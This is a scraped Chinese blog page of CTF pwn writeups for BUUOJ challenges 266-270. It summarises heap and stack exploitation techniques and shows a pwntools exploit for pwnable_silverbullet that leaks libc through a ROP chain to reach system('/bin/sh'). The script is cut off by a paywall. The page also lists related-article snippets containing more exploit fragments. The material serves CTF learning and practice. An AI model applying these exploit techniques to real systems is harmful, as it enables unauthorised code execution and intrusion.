buuoj Pwn writeup 266-270

最新推荐文章于 2024-10-08 19:18:18 发布
原创 最新推荐文章于 2024-10-08 19:18:18 发布 · 272 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

这些博客文章涉及了多种安全漏洞的利用,包括缓冲区溢出、未初始化的内存使用以及文件大小限制。在266pwnable_silverbullet中,作者展示了如何通过缓冲区溢出修改`puts`函数指针来执行任意代码。在267qwb2018_slient2中,通过调整输入大小和利用未初始化的内存,实现了`free`函数指针的覆盖,从而达到执行`system`的目的。268suctf2018_heap利用了strlen函数的off-by-one错误进行堆溢出,并通过精心构造的数据修改了`atoi`的got表,最后执行`system`。而在269pwnable_otp中,利用`fread`的未检查错误和`ulimit`命令限制,使得程序接受特定输入,绕过检查。270qctf_2018_babyheap中,通过一系列heap操作,如off-by-null,实现了一次house of ein,最终执行了shell。

266 pwnable_silverbullet

在这里插入图片描述create
在这里插入图片描述创造个什么武器,然后武器描述,然后长度是它的什么power。

power_up
在这里插入图片描述
那么显然我刚刚如果通过’\x00’的截断,power整成0,那么我这里可以直接溢出。

beat
在这里插入图片描述
exp

from pwn import *
context.log_level = "debug"

r = remote('node4.buuoj.cn',25942)

libc = ELF('./32/libc-2.23.so')
elf = ELF('./266')

main = 0x8048954

def create(des):
    r.sendlineafter("Your choice :",'1')
    r.sendafter("Give me your description of bullet :",des)

def power(des):
    r.sendlineafter("Your choice :",'2')
    r.sendafter("bullet :",des)

def beat():
    r.sendlineafter("Your choice :",'3')


puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

create('A'*0x20)
power('B'*0x10)
power(p32(0x7FFFFFFF)+"A"*3+p32(puts_plt)+p32(main)+p32(puts_got))
beat()

r.recvuntil('Oh ! You win !!\n')

puts = u32(r.recvuntil('\n',drop=True).ljust(4,'\x00'))
libc_base = puts - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
print "libc_base = " + hex(libc_base)

create('A'*0x20)
power('B'*0x10)
power(p32(0x7FFFFFFF
最低0.47元/天 解锁文章
BUUCTF qwb2018_slient2
weixin_45966329的博客
03-06 280
BUUCTF qwb2018_slient2 1、该题在BUUCTF上的环境是2.27版本,所以相对来说更加的容易了 2、只需要利用double free 使用tcache attach攻击free函数的got表的地址 3、然后在free的got表中写入sysytem函数的plt表地址 4、再free掉一个写入/bin/sh的chunk即可 from pwn import * context(os='linux', arch='amd64',log_level='debug') io=remote("nod
python类逆向总结
woshiyanfu的博客
09-28 2257
Python是解释型语言,没有严格意义上的编译和汇编过程。但是一般可以认为编写好的python源文件,由python解释器翻译成以.pyc为结尾的字节码文件。pyc文件是二进制文件,可以由python虚拟机直接运行。Python在执行import语句时,将会到已设定的path中寻找对应的模块。并且把对应的模块编译成相应的PyCodeObject中间结果,然后创建pyc文件,并将中间结果写入该文件。
NSSCTF(MISC)—[SUCTF 2018 招新赛]佛家妙语
最新发布
hzhfhsq的博客
10-08 327
依次解码 顺序为:base64-base32-base16-base58。
SUCTF 2018 招新赛之Misc篇刷题记录(14)
Aluxian_的博客
08-20 577
【代码】NSSCTF之Misc篇刷题记录(14)
BUUCTF misc 专题(94)[SUCTF2018]followme
tt_npc的博客
05-28 713
下载附件,拖进wireshark中查看协议分级 http占了大部分,导出http对象,很多个文件,查看 看得出来,是在爆破密码 ,那几只能通过找关键字了,这是SUCTF的题,那就以SUCTF作为关键字查找 找到flag,包上flag,flag{password_is_not_weak} ...
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 364
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 587
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
suctf2018_heap
doudoudedi
02-27 428
suctf2018_heap 这道题会一次性申请2个相同大小的chunk做的时候有点逻辑混乱深深的怀疑本来是ubuntu16的环境… 思路 : off by one打成堆重叠写到指针段写atoi为system拿shell exp: from pwn import * #p=process('./offbyone') p=remote('node3.buuoj.cn',26238) elf=ELF(...
2018 SUCTF招新赛
qq_42192672的博客
11-15 2007
PWN 1.stack checksec一波 什么保护都没开,可还行,IDA找一波漏洞 read函数百分之百溢出 我们看到了我们喜爱的 改一下rip美滋滋 exp #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','b...
[SUCTF 2019]Pythonginx
Yang_99的博客
08-17 926
1.2019black hat一个议题 PPT:https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf 这也就是说我们传入的url为http://evil.c℀.com在经过上述处理过后便成为了http://evil.ca/c.com 在unicode中字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此ur
2018强网杯silent2
snowleopard_bin的博客
09-26 686
看了雪论坛里一位大佬的writeup,感到一丝迷茫,遂另起炉灶,提供另一种类似的做法,我多加了解释,应该会更加通俗易懂。 发现NX、Canary都开了,但Partial RELRO说明可以修改got表,PIE说明没有地址随机化,就可以直接利用IDA中看到的地址,不需要计算libc偏移了 先看main函数 case1:功能就是create啦 注意到*&s[8*i] = v...
2018强网杯部分writeup
snowleopard_bin的博客
09-20 2608
0x00 签到题 操作内容: 打开题目就看到flag FLAG值: flag{welcome_to_qwb} 0x01 Welcome 操作内容: |拿到一张图片:               放进Stegsolve中,一点点偏移图片,慢慢发现有字,offset到100时就能清楚看到 得到flag FLAG值: QWB{W3lc0me} 0x02 web签到 操作内容:...
2018年强网杯之silent2
极目楚天舒的博客
04-23 757
0x01分析行为按照正常思路添加、编辑、释放Add函数分配大小为16字节或大于0x7f字节的堆块,将堆地址放入0x6020c0的bss段内。Free函数释放堆块,但是没有将指针清零,导致doublefree。Edit函数修改堆块内容,修改长度不超过原来的长度。0x02利用点checksec检查发现可以对got表进行写,很自然联想到用system函数地址覆盖strlen_got_plt,这样当调用E...
XCTF 4th-QCTF-2018 babyheap
qq_41071646的博客
07-28 1938
这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。 先看一下这个题目的保护 基本该有的保护都有了 然后先看一下这个题 ida里面分析 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠 然后申请达到修改堆块还有泄露堆块的目的 这里我们发现了 off by null 然后这里的思路 exp 来源于 https://www.xct...
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2295
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
[QCTF2018]babyre
qq_37439229的博客
05-07 713
一道一般般的题。。。 打开ida,调试到这里 发现长度为0x20,于是输入“ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^-`” 第一个函数 打乱我的输入顺序,第二个函数从第三个数开始,每四个为一组分别加一些数,第三个函数从第9个开始,每四个一组进行一些位运算 写出脚步 flag=[0xda,0xd8,0x3d,0x4c,0xe3,0x63,0x97,0x3d,0xc1,0x91,...
QCTF2018 Misc - X-man-Keyword writeup
xuchen16的博客
07-17 1727
转载自:http://www.cnblogs.com/semishigure/p/9318258.html 一张图片,上 Stegsolve ,发现图片开头 lsb 里有些东西。 用 lsb 解密脚本 , 可以得到: PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf} 根据题目提示,尝试了一下,发现是 Nihilist 密码 。 简单说一下原理 原...
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值